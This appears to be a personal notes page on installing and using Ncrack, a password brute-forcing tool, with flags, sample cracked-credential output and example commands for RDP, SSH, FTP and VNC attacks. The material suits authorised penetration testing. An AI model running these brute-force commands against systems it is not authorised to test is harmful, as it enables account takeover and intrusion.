![首頁 Logo Keith ]p !!](/themes/mytheme/logo.png){kind=logo}
最後更新: 2023-01-05
介紹
A client-server multithreaded application for bruteforce cracking passwords.
NCRACK - BRUTE FORCE ATTACK ON RDP, VNC, SSH, FTP
http://sourceforge.net/projects/bruteforcer/
# Debian GNU/Linux 7
apt-get install build-essential checkinstall libssl-dev libssh-dev
cd /usr/src
wget http://nmap.org/ncrack/dist/ncrack-0.4ALPHA.tar.gz
tar -xzf ncrack-0.4ALPHA.tar.gz
cd ncrack-0.4ALPHA
./configure
make
make install
Usage
-v: increase verbosity level (use twice or more for greater effect).
-f: quit cracking service after one found credential.
– -user: comma-separated username list.
-P: password file.
CL: maximum number of concurrent parallel connections.
[service-name]://target:[port-number]: self explanatory.
Example 1. A representative Ncrack scan
$ ncrack 10.0.0.130:21 192.168.1.2:22
Starting Ncrack 0.01ALPHA ( http://ncrack.org ) at 2009-07-24 23:05 EEST
Discovered credentials for ftp on 10.0.0.130 21/tcp:
10.0.0.130 21/tcp ftp: admin hello1
Discovered credentials for ssh on 192.168.1.2 22/tcp:
192.168.1.2 22/tcp ssh: guest 12345
192.168.1.2 22/tcp ssh: admin money$
EXAMPLES:
ncrack -v --user root localhost:22
ncrack -v -T5 https://192.168.0.1
ncrack -v -iX ~/nmap.xml -g CL=5,to=1h
VNC
8-character limit
--pass <password_list>: comma-separated password list
verbose mode (-v)
read a list of IP addresses (-iL win.txt)
attempt to login with the username victim (–user victim)
the passwords in a dictionary (-P passes.txt)
RDP protocol (-p rdp)
one connection at a time (CL=1)
ncrack -v -iL win.txt --user victim -P passes.txt -p rdp CL=1
ncrack -v -p vnc 192.168.88.177
/usr/local/share/ncrack/ncrack-services
ftp 21/tcp ssh 22/tcp telnet 23/tcp http 80/tcp pop3 110/tcp smb 139/tcp smb 445/tcp https 443/tcp pop3s 995/tcp rdp 3389/tcp vnc 5900/tcp
